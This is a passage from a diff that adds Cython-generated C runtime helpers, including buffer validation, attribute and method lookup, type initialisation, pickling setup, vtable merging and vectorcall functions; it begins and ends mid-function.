__Pyx_BufFmt_Context ctx; + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (!__Pyx_BufFmt_CheckString(&ctx, buf->format)) goto fail; + } + if (unlikely((size_t)buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "d byte%s) does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "d byte%s)", + buf->itemsize, (buf->itemsize > 1) ? "s" : "", + dtype->name, (Py_ssize_t)dtype->size, (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->suboffsets == NULL) buf->suboffsets = __Pyx_minusones; + return 0; +fail:; + __Pyx_SafeReleaseBuffer(buf); + return -1; +} + +/* BufferFallbackError */ + static void __Pyx_RaiseBufferFallbackError(void) { + PyErr_SetString(PyExc_ValueError, + "Buffer acquisition failed on assignment; and then reacquiring the old buffer failed too!"); +} + +/* PyObjectCallNoArg */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* WriteUnraisableException */ + static void __Pyx_WriteUnraisable(const char *name, int clineno, + int lineno, const char *filename, + int full_traceback, int nogil) { + PyObject *old_exc, *old_val, *old_tb; + PyObject *ctx; + __Pyx_PyThreadState_declare +#ifdef WITH_THREAD + PyGILState_STATE state; + if (nogil) + state = PyGILState_Ensure(); + else state = (PyGILState_STATE)0; +#endif + CYTHON_UNUSED_VAR(clineno); + CYTHON_UNUSED_VAR(lineno); + CYTHON_UNUSED_VAR(filename); + CYTHON_MAYBE_UNUSED_VAR(nogil); + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&old_exc, &old_val, &old_tb); + if (full_traceback) { + Py_XINCREF(old_exc); + Py_XINCREF(old_val); + Py_XINCREF(old_tb); + __Pyx_ErrRestore(old_exc, old_val, old_tb); + PyErr_PrintEx(1); + } + #if PY_MAJOR_VERSION < 3 + ctx = PyString_FromString(name); + #else + ctx = PyUnicode_FromString(name); + #endif + __Pyx_ErrRestore(old_exc, old_val, old_tb); + if (!ctx) { + PyErr_WriteUnraisable(Py_None); + } else { + PyErr_WriteUnraisable(ctx); + Py_DECREF(ctx); + } +#ifdef WITH_THREAD + if (nogil) + PyGILState_Release(state); +#endif +} + +/* PyObject_GenericGetAttrNoDict */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* FixUpExtensionType */ + #if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* PyObjectGetMethod */ + static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ + static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ + #if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ + static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* SetupReduce */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name_2); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* SetVTable */ + static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ + static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* TypeImport */ + #ifndef __PYX_HAVE_RT_ImportType_3_0_0 +#define __PYX_HAVE_RT_ImportType_3_0_0 +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject *module, const char *module_name, const char *class_name, + size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size) +{ + PyObject *result = 0; + char warning[200]; + Py_ssize_t basicsize; + Py_ssize_t itemsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + PyObject *py_itemsize; +#endif + result = PyObject_GetAttrString(module, class_name); + if (!result) + goto bad; + if (!PyType_Check(result)) { + PyErr_Format(PyExc_TypeError, + "%.200s.%.200s is not a type object", + module_name, class_name); + goto bad; + } +#if !CYTHON_COMPILING_IN_LIMITED_API + basicsize = ((PyTypeObject *)result)->tp_basicsize; + itemsize = ((PyTypeObject *)result)->tp_itemsize; +#else + py_basicsize = PyObject_GetAttrString(result, "__basicsize__"); + if (!py_basicsize) + goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (basicsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; + py_itemsize = PyObject_GetAttrString(result, "__itemsize__"); + if (!py_itemsize) + goto bad; + itemsize = PyLong_AsSsize_t(py_itemsize); + Py_DECREF(py_itemsize); + py_itemsize = 0; + if (itemsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; +#endif + if (itemsize) { + if (size % alignment) { + alignment = size % alignment; + } + if (itemsize < (Py_ssize_t)alignment) + itemsize = (Py_ssize_t)alignment; + } + if ((size_t)(basicsize + itemsize) < size) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize+itemsize); + goto bad; + } + if (check_size == __Pyx_ImportType_CheckSize_Error_3_0_0 && + ((size_t)basicsize > size || (size_t)(basicsize + itemsize) < size)) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd-%zd from PyObject", + module_name, class_name, size, basicsize, basicsize+itemsize); + goto bad; + } + else if (check_size == __Pyx_ImportType_CheckSize_Warn_3_0_0 && (size_t)basicsize > size) { + PyOS_snprintf(warning, sizeof(warning), + "%s.%s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize); + if (PyErr_WarnEx(NULL, warning, 0) < 0) goto bad; + } + return (PyTypeObject *)result; +bad: + Py_XDECREF(result); + return NULL; +} +#endif + +/* FetchSharedCythonModule */ + static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ + static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ + #if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ + static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + 